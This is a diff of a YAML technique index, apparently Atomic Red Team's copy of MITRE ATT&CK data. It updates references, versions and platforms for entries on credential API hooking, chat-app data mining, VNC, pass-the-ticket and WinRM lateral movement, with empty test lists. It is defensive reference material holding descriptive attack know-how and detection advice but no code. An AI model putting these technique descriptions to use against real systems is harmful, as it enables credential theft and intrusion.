+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
       - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
         description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
           Retrieved December 18, 2017.
         url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Hook Overview
         description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
           December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
         description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
         description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
           12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
         description: Stack Exchange - Security. (2012, July 31). What are the methods
           to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
-      name: 'Input Capture: Credential API Hooking'
-      description: |
-        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
-        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
-        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
-        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1056.004
+    atomic_tests: []
+  T1213.005:
+    technique:
+      modified: '2024-10-16T14:22:49.146Z'
+      name: Messaging Applications
+      description: "Adversaries may leverage chat and messaging applications, such
+        as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+        \ \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on messaging applications: \n\n*
+        Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+        \n* Source code snippets \n* Links to network shares and other internal resources
+        \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+        about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+        2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+        messaging applications, adversaries may leverage data from chat messages in
+        order to improve their targeting - for example, by learning more about an
+        environment or evading ongoing incident response efforts.(Citation: Sentinel
+        Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: |-
-        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
-        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
-        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - Obsidian Security
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      - Office Suite
       x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
-      - 'Process: Process Metadata'
-      - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-      identifier: T1056.004
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+      created: '2024-08-30T13:50:42.023Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/005
+        external_id: T1213.005
+      - source_name: Sentinel Labs NullBulge 2024
+        description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+          as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+        url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+      - source_name: SC Magazine Ragnar Locker 2021
+        description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+          victims it can read the on-network incident response chat rooms. Retrieved
+          August 30, 2024.
+        url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+      - source_name: Guardian Grand Theft Auto Leak 2022
+        description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+          19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+          Retrieved August 30, 2024.'
+        url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+      - source_name: Microsoft DEV-0537
+        description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+          organizations for data exfiltration and destruction. Retrieved March 23,
+          2022.
+        url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
 lateral-movement:
   T1021.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:20:07.264Z'
       name: Remote Services:VNC
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
@@ -41818,6 +42505,7 @@ lateral-movement:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: lateral-movement
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
 
@@ -41827,7 +42515,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -41843,66 +42530,67 @@ lateral-movement:
       id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
       created: '2020-02-11T18:28:44.950Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1021/005
         external_id: T1021.005
-      - source_name: The Remote Framebuffer Protocol
-        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
-          Framebuffer Protocol. Retrieved September 20, 2021.
-        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: Attacking VNC Servers PentestLab
+        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+          VNC Servers. Retrieved October 6, 2021.
+        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
       - source_name: MacOS VNC software for Remote Desktop
         description: Apple Support. (n.d.). Set up a computer running VNC software
           for Remote Desktop. Retrieved August 18, 2021.
         url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
-      - source_name: VNC Authentication
-        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
-          September 20, 2021.
-        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
-      - source_name: Hijacking VNC
-        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
-          Access and Crack). Retrieved September 20, 2021.'
-        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+      - source_name: Havana authentication bug
+        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+          seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+        url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
       - source_name: macOS root VNC login without authentication
         description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
           root account without authentication. Retrieved September 20, 2021.
         url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
-      - source_name: VNC Vulnerabilities
-        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
-          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
-        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
       - source_name: Offensive Security VNC Authentication Check
         description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
           6, 2021.
         url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
-      - source_name: Attacking VNC Servers PentestLab
-        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
-          VNC Servers. Retrieved October 6, 2021.
-        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
-      - source_name: Havana authentication bug
-        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
-          seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
-        url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
-      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
-        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
-          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
-          August 19, 2021.'
-        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
       - source_name: Gnome Remote Desktop grd-settings
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
       - source_name: Gnome Remote Desktop gschema
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+          August 19, 2021.'
+        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+      - source_name: VNC Vulnerabilities
+        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+      - source_name: The Remote Framebuffer Protocol
+        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+          Framebuffer Protocol. Retrieved September 20, 2021.
+        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: VNC Authentication
+        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+          September 20, 2021.
+        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+      - source_name: Hijacking VNC
+        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+          Access and Crack). Retrieved September 20, 2021.'
+        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1021.005
     atomic_tests: []
   T1080:
     technique:
-      modified: '2023-05-31T12:33:20.915Z'
+      modified: '2024-10-15T16:07:36.903Z'
       name: Taint Shared Content
       description: |2-
 
@@ -41927,11 +42615,11 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
       - Linux
       - macOS
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Network Share: Network Share Access'
       - 'Process: Process Creation'
@@ -41954,9 +42642,8 @@ lateral-movement:
         url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.004:
     technique:
@@ -42007,7 +42694,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.004
     atomic_tests: []
   T1091:
@@ -42071,7 +42757,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1021.008:
@@ -42142,7 +42827,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.001:
     technique:
@@ -42179,7 +42863,7 @@ lateral-movement:
         url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
         description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
           11 security incident. Retrieved February 17, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-23T23:11:24.682Z'
       name: SSH Hijacking
       description: |-
         Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
@@ -42210,8 +42894,6 @@ lateral-movement:
       - root
       x_mitre_system_requirements:
       - SSH service enabled, trust relationships configured, established connections
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1021.002:
     technique:
@@ -42294,12 +42976,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.002
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -42326,6 +43007,7 @@ lateral-movement:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -42343,12 +43025,12 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -42374,14 +43056,13 @@ lateral-movement:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021:
     technique:
@@ -42499,7 +43180,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563:
     technique:
@@ -42553,11 +43233,10 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.006:
     technique:
-      modified: '2023-08-11T15:26:41.941Z'
+      modified: '2024-09-12T15:28:23.398Z'
       name: 'Remote Services: Windows Remote Management'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -42609,14 +43288,13 @@ lateral-movement:
           April 27, 2016.
         url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
       - source_name: Microsoft WinRM
-        description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa384426
+        description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.006
     atomic_tests: []
   T1021.003:
@@ -42702,12 +43380,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.003
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -42727,6 +43404,7 @@ lateral-movement:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -42734,7 +43412,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -42750,39 +43427,40 @@ lateral-movement:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1021.007:
     technique:
-      modified: '2023-04-14T22:27:04.095Z'
+      modified: '2024-10-15T15:52:47.255Z'
       name: Cloud Services
       description: "Adversaries may log into accessible cloud services within a compromised
         environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
@@ -42807,12 +43485,11 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
-      - Azure AD
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       type: attack-pattern
@@ -42826,13 +43503,12 @@ lateral-movement:
         external_id: T1021.007
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -42849,7 +43525,7 @@ lateral-movement:
         on cloud-hosted instances, as well as the execution of arbitrary commands
